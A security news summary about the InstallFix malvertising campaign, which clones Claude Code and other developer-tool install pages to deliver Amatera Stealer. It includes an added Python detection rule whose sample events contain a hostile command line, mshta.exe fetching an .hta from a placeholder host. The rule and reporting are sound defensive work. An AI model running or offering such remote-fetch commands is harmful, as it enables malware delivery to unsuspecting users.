www.securityweek.com 3/9/2026, 11:46:43 AM

InstallFix malvertising clones Claude pages to Amatera Stealer


SECURITYWEEK reports that cloned webpages impersonating popular development tools are being used in the InstallFix campaign to deliver information-stealing malware. According to Push Security, threat actors replace legitimate install commands on cloned pages and rely on malvertising, with one variant targeting Anthropic’s Claude Code CLI and served exclusively through Google Ads to boost visibility.

The cloned pages are near pixel-perfect replicas, but the install one-liner a visitor copies from them ultimately points to an attacker-controlled server that serves an infostealer instead of the legitimate installer. When the payload runs, cmd[.]exe spawns mshta[.]exe to fetch code from a remote server, triggering an Amatera Stealer infection.
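The process chain described above (a shell spawning mshta.exe with a remote location to pull code from) is something endpoint telemetry can flag directly. The following is an added example, not code from the SecurityWeek or Push Security report; it assumes process-creation events with Sysmon-style Image, ParentImage and CommandLine fields, generalizes the parent check to PowerShell as well as cmd.exe, and runs over constructed sample events with a placeholder hostname.

```python
"""Flag mshta.exe launched by a shell with a remote (URL or UNC) location.

Added example for the InstallFix chain described above. Assumes events
shaped like Sysmon Event ID 1 (Image, ParentImage, CommandLine);
the sample events below are constructed, not indicators from the article.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the newly created process
    parent_image: str   # full path of its parent process
    command_line: str   # command line of the new process


# Remote locations mshta can load code from: http(s)/ftp URLs or UNC paths.
REMOTE_RE = re.compile(r"(?i)\b(?:https?|ftp)://|\\\\[\w.-]+\\")

# Shells seen launching the stage; the article names cmd.exe, PowerShell is
# included as a defensive generalization (assumption).
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_suspicious_mshta(ev: ProcEvent) -> bool:
    """True when a shell spawned mshta.exe and handed it a remote location."""
    if basename(ev.image) != "mshta.exe":
        return False
    spawned_by_shell = basename(ev.parent_image) in SHELL_PARENTS
    return spawned_by_shell and bool(REMOTE_RE.search(ev.command_line))


def triage(events):
    """Return only the events matching the shell -> mshta -> remote pattern."""
    return [ev for ev in events if is_suspicious_mshta(ev)]


# Constructed sample telemetry: one hit, one local benign HTA, one plain cmd.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\cmd.exe",
              'mshta.exe "http://installer-mirror.example/stage.hta"'),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r'mshta.exe "C:\Program Files\Vendor\help.hta"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("ALERT", basename(hit.parent_image), "->", basename(hit.image),
              "|", hit.command_line)
```

A local .hta opened from explorer.exe is deliberately not flagged, so the rule keys on the remote-fetch behaviour rather than on mshta.exe alone.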

Push Security notes that the actors host the malicious content on legitimate hosting platforms such as Cloudflare Pages, Squarespace and Tencent EdgeOne so that it blends in with normal traffic, and have been observed distributing malware via clones of claude[.]ai, Homebrew, GitHub repositories and NPM packages that mimic Claude Code. This is described as part of a broad malvertising and impersonation campaign, with different cloned sites observed delivering identical binaries.


Article by CyberSIXT